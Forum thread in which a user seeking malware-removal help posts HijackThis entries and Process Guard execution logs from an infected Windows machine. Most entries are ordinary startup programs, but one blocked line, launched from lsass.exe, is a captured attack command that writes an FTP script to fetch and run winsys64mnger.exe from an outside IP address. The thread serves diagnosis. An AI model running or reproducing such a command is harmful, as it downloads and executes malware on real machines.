O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Yahoo! Pager] D:\PROGRA~1\YAHOO!\MESSEN~1\ypager.exe -quiet
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: Linked ima&ges - C:\Program Files\IEimage\IEimage.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O15 - Trusted Zone: http://www.giftedonl...edusearch.co.nz
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupd...b?1098860877234
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoft.../as5/asinst.cab
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe

---Process Guard Log Started---
Tue 23 - 17:20:01 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 23 - 17:20:02 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1296]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 23 - 17:20:03 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 23 - 17:20:03 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 23 - 17:20:04 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 23 - 17:20:04 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1184]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Tue 23 - 17:20:04 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 23 - 17:20:05 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 23 - 17:20:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 23 - 17:20:05 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 23 - 17:20:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2016]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 23 - 17:20:06 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 23 - 17:20:06 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 23 - 17:20:06 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 23 - 17:20:06 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 23 - 17:20:07 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 23 - 17:20:08 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 23 - 17:20:09 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 23 - 17:20:09 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 23 - 17:20:09 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [796]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 23 - 17:20:10 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]

---Process Guard Log Started---
Tue 23 - 17:25:09 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [524]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 23 - 17:25:09 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [524]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 23 - 17:25:11 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1516]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 23 - 17:25:12 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 23 - 17:25:13 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1312]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Tue 23 - 17:25:13 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 23 - 17:25:14 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 23 - 17:25:15 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 23 - 17:25:15 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 23 - 17:25:15 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1800]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 23 - 17:25:15 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 23 - 17:25:16 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 23 - 17:25:16 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 23 - 17:25:17 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 23 - 17:25:18 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 23 - 17:25:18 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 23 - 17:25:18 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 23 - 17:25:19 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 23 - 17:25:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1980]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 23 - 17:25:20 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 23 - 17:25:25 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [524]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 23 - 17:26:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds67de67af0af153498cbfa8878d933ccb ]
Tue 23 - 17:26:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsf8fdb505fc8ffc4fa2b7653042a2d7ea ]
Tue 23 - 17:26:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds9921a64800048f438f53a81d56c50b65 ]
Tue 23 - 17:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds340e649a472bf34085615643689fe648 ]
Tue 23 - 17:49:28 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2d8 -s 00000ba0 -b c: ]
Tue 23 - 17:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsa5ec33f6f710224286ee82e58414c816 ]
Tue 23 - 17:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds9d6a113e49b2ad429e7eac9e044b278f ]
Tue 23 - 18:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsaceb3788c087c84e8608c792cd56c8c3 ]
Tue 23 - 18:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdse277995ddafabb4d8b3908225c51a0d1 ]
Tue 23 - 18:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsbd60c8d698766248b250f27e66a9f34d ]
Tue 23 - 18:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds6e534f6ad4eb934db9d1f9316bac69a2 ]
Tue 23 - 19:01:47 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 23 - 19:02:42 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [536]
[EXECUTION] Commandline - [ cmd /k echo open 202.124.159.120 24056 >> ii&echo user 1 1 >> ii &echo get winsys64mnger.exe >> ii &echo quit >> ii &ftp -n -s:ii &winsys64mnger.exe
]
Tue 23 - 19:05:20 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\system32\notepad.exe" ]
Tue 23 - 19:06:20 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Tue 23 - 19:06:29 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1260]
[EXECUTION] Commandline - [ regedit.exe "c:\scvhost.reg" ]
Tue 23 - 19:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsd0e0d0464a658f419422c1686ba26bbe ]
Tue 23 - 19:26:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds7cd5f2a80590da4d8e29fe3a9b5a5e04 ]
Tue 23 - 19:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdse4922583f20e53408369281a674ae6e6 ]
Tue 23 - 19:56:05 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsa274d2b92dd70a41aebdac5d34553de5 ]
Tue 23 - 20:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds603623d200ea574b8ea700676237e6df ]
Tue 23 - 20:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds32300baa1d157c4c8ed4c2591dace104 ]
Tue 23 - 20:56:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susdsa5ffffd4e1d54644b78a13a31470bfd0 ]
Tue 23 - 20:56:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds6b761e99f7f3014a80260e22480a36fd ]
Tue 23 - 21:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds30c6d9aecd71004f98ee17beef017b67 ]
Tue 23 - 21:26:06 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [728]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d8]susds647a4cf281853344ac67ac2d8b203fe2 ]
Tue 23 - 21:33:43 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [476]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Tue 23 - 21:33:54 [TERMINATE] c:\windows\system32\services.exe [524] was blocked from terminating c:\windows\system32\spoolsv.exe [972]

---Process Guard Log Started---
Wed 24 - 19:10:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1492]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 24 - 19:10:32 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1272]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Wed 24 - 19:10:32 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 24 - 19:10:33 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1272]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Wed 24 - 19:10:34 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 24 - 19:10:34 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 24 - 19:10:35 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 24 - 19:10:35 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 24 - 19:10:36 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 24 - 19:10:37 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 24 - 19:10:37 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 24 - 19:10:38 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 24 - 19:10:39 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 24 - 19:10:39 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 24 - 19:10:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 24 - 19:10:40 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 24 - 19:10:41 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2028]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 24 - 19:10:41 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 24 - 19:10:42 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1840]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 24 - 19:10:49 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [568]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 24 - 19:11:18 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]
Wed 24 - 19:11:28 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susdsf297694e0c0570459059c0c9f5c8789b ]
Wed 24 - 19:11:28 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susds09e945bdfa395b4cb0645046af2bcfa5 ]
Wed 24 - 19:11:29 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susds03304e4aa107c448b60c86b73ecab611 ]
Wed 24 - 19:11:29 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[314]susds9c0e97e59fbc2f42bf2a1583e5040c56 ]
Wed 24 - 19:11:32 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" [908]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\documents and settings\dug and tania\my documents\hijack\hijackthis.log ]
Wed 24 - 19:12:15 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 24 - 19:13:34 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1160]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
thanks for your help
  • 0

#149
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
This log may interest you as well; tftp.exe is back.

---Process Guard Log Started---
Wed 24 - 19:23:25 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 24 - 19:23:26 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 24 - 19:23:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1320]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 24 - 19:23:27 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 24 - 19:23:28 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 24 - 19:23:28 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 24 - 19:23:28 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1004]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 24 - 19:23:28 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
